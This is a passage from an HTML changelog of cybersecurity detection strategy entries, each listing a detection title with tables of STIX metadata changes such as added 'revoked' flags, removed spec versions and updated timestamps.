Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.689000+00:00</td></tr></tbody></table></details><hr><h4>[DET0104] Detect Modification of Authentication Processes Across Platforms</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.694000+00:00</td></tr></tbody></table></details><hr><h4>[DET0272] Detect Modification of Network Device Authentication via Patched System Images</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.684000+00:00</td></tr></tbody></table></details><hr><h4>[DET0429] Detect Modification of macOS Startup Items</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.682000+00:00</td></tr></tbody></table></details><hr><h4>[DET0228] Detect Multi-Stage Command and Control Channels</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.679000+00:00</td></tr></tbody></table></details><hr><h4>[DET0367] Detect Network Logon Script Abuse via Multi-Event Correlation on Windows</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.673000+00:00</td></tr></tbody></table></details><hr><h4>[DET0580] Detect Network Provider DLL Registration and Credential Capture</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.677000+00:00</td></tr></tbody></table></details><hr><h4>[DET0053] Detect Obfuscated C2 via Network Traffic Analysis</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.695000+00:00</td></tr></tbody></table></details><hr><h4>[DET0398] Detect Office Startup-Based Persistence via Macros, Forms, and Registry Hooks</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.681000+00:00</td></tr></tbody></table></details><hr><h4>[DET0581] Detect One-Way Web Service Command Channels</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.695000+00:00</td></tr></tbody></table></details><hr><h4>[DET0050] Detect Persistence via Malicious Office Add-ins</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.677000+00:00</td></tr></tbody></table></details><hr><h4>[DET0095] Detect Persistence via Malicious Outlook Rules</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.683000+00:00</td></tr></tbody></table></details><hr><h4>[DET0519] Detect Persistence via Office Template Macro Injection or Registry Hijack</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.695000+00:00</td></tr></tbody></table></details><hr><h4>[DET0315] Detect Persistence via Office Test Registry DLL Injection</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.692000+00:00</td></tr></tbody></table></details><hr><h4>[DET0029] Detect Persistence via Outlook Custom Forms Triggered by Malicious Email</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.681000+00:00</td></tr></tbody></table></details><hr><h4>[DET0177] Detect Persistence via Outlook Home Page Exploitation</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.695000+00:00</td></tr></tbody></table></details><hr><h4>[DET0365] Detect Registry and Startup Folder Persistence (Windows)</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: 